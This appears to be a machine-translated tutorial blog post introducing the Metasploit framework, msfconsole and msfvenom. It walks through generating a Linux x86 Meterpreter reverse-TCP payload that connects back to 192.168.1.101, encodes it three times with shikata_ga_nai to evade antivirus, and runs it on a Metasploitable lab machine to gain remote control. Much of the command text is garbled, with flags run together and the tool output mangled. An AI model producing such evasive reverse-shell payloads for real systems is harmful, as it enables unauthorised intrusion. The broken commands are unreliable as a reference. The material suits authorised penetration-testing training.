Metasploit Introduction
Almost every person who plays infiltration will be exposed to the Metasploit framework, referred to as MSF. This is a penetration testing framework, written in the Ruby language, which integrates many of the available exploit, such as the famous ms08_067. You can perform a series of penetration tests in this framework, using existing payload, such as Meterpreter, to further pick up each other's shell. Download the address on GitHub, Git clone the project to install locally.
Common Tools Introduction Msfconsole
This is the terminal command to start MSF, and note that since the MSF default database is PostgreSQL, you need to start the PostgreSQL database before starting MSF.
The MSF can be started by entering Msfconsole in the terminal, and if it is not clear that the Msfconsole function may be entered in the terminal
msfconsole -h
You can learn the options related to Msfconsole.
For example:
In Msfconsole, it is important to note that Msfconsole is not only a tool for launching MSF directly, but also a third-party payload file that can be executed with MSF.
msfconsole -r payload.file
This feature works well with veil. Veil is a code payload artifact, specifically used to kill soft, when generating the corresponding stagers-type payload, will also generate stages-type payload for the infiltration end call, the payload is compatible with MSF.
Msfvenom
There are tools such as Msfencode,msfpayload in the previous MSF release, which are expensive to learn and are now obsolete. Instead, the Msfvenom tool can be seen as a combination of Msfencode and msfpayload, which allows you to generate the payload you want yourself.
to learn msfvenom, you can see the description of Msfvenom in the terminal by playing:
msfvenom-h
.
If you need to see Msfvenom existing payload, you can use
msfvenom-l payloads
to see all available payloads.
Below we use the LINUX/X86/METERPRETER/REVERSE_TCP payload to demonstrate the creation of an elf file that can be executed under a x86 schema.
simply type on the command line:
[email protected] ~ $ msfvenom-p linux/x86/meterpreter/reverse_tcp--payload-options
To see the parameter options for this payload:
It is important to note that the arch option is used to represent the kernel architecture that the payload applies to, and if it is the kernel of the x86 architecture, it will work, but the kernel of the x64 architecture will not run. The kernel of the x86_64 architecture is the ability to run both 32-bit programs and 64-bit programs.
about how to view the kernel schema, you can:
-a3.13.0-24#46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
-a2.6.24-16#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
You can see that the kernel architecture of Msfadmin is the x86 architecture, and the i686 architecture is also a x86 that can only run 32-bit programs on the platform.
Below we generate a payload executable on the metasploitable:
[Email protected] ~ $ msfvenom-p linux/x86/meterpreter/reverse_tcp lhost=192.168. 1. 101-F elf-e x86/shikata_ga_nai-i3-OShellNoPlatformwas selected, choosing Msf::module::P latform::linux from thePayloadno Arch selected, selecting arch:x86 from thePayloadfound1Compatible encodersattempting toEncode payload with 3Iterations ofX86/shikata_ga_naix86/shikata_ga_nai succeeded withSize98(iteration=0) X86/shikata_ga_nai succeeded withSize the(iteration=1) X86/shikata_ga_nai succeeded withSize the(iteration=2) X86/shikata_ga_nai Chosen withFinal size thePayload Size: the bytesFinal size ofElffile:236 bytesSaved as:Shell
You can see that the options that are not set are the default in payload. The following shell file is the elf executable file for the Linux kernel with x86. At the same time we x86/shikata_ga_nai encoding it to 3 times encoding, in order to avoid killing .
We copy it into the metasploitable system, and we monitor the connection with the corresponding handler in the freestyle4568 system.
freestyle4568@freestyle4568$ scp shell msfadmin@192.168.1.103:/home/msfadminmsfadmin@192.168.1.103‘s password: shell 100% 236 0.2KB/s 00:00
Run the shell file in Msfadmin, and then listen with MSF in freestyle4568.
Ok! Now get the Meterpreter, now basically has control 192.168.1.103.
About Meterpreter, have time to open another article, because this payloader is too strong.
Metasploit Framework Detailed